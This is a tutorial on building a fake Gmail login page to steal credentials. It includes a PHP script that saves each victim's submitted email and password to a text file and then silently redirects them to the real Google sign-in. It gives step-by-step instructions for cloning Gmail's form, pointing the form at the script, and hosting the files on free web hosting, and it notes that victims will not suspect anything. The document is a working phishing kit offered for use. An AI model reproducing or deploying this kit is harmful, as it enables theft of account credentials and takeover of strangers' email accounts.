Pishing is the process of Stealing sensitive information (silently), such as usernames, passwords, and bank information, by pretending to be someone you’re not. I have already explained it in detail in FACEBOOK phishing.
This step-by-step guide will show you how you can make your own Gmail Phishing (Fake) page easily...have fun!
Files we will be creating:
1. phishing.php
2. index.html
3. password.txt
Step 1: Creating phishing.php file
First of all we need a PHP script which will collect all the form data. Copy the following code in a text editor (notepad) and save it as phishing.php
<html> <body> <?php $handle = fopen("password.txt", "a"); fwrite($handle,$_POST["Email"]); fwrite($handle,"\n"); fwrite($handle,$_POST["Passwd"]); fwrite($handle,"\n"); fwrite($handle,"\n"); fclose($handle) ; header("Location:https://www.google.com/accounts/ServiceLoginAuth"); exit; ?> </body> </html>
Step 2 : Creating index.html page
Goto Gmail.com (without logging in) , right click anywhere in the browser and choose view page source. Open the source code in a text editor (notepad).
Step 3: Now a new window will pop-up where you can see all the HTML code.
We need to look for word action. Press CRTL+F and search for action. You will find two action in the code so choose the right one by looking up the following screen-shot (ie, with form id="gaia_loginform"). Replace the link after action between the "..... " with phishing.php (as in the screen-shot)and save this page as index.html (not index.html.txt!!!).
Step 4: Creating text file (password.txt)
Now make a new empty text file and name it password.txt
Now you have all the three files required
Step 5: Final step
Upload all the 3 files in file manager of your web hosting. If you don't have your own webhosting at present, search for a free web hosing site which gives PHP access. I prefer www.phpzilla.net .
Sign up for a free web hosting plan on this site. Goto file manager and Upload all the 3 files and save it.
Once everything is up and ready to go, go to the link your host provided you for your website and you should see the Gmail page replica. Type in a username/password and click Sign in. This should have redirected you to the real Gmail page.
Now whoever will try to login for Gmail through your Fake page, his/her Username and Password will be automatically saved in Password.txt file as plain text which you can view easily. Also the the victim won't have a hint that he/she has been hacked since, he/she will be redirected to the original Gmail page and will get a feel as if he/she entered a wrong password by mistake.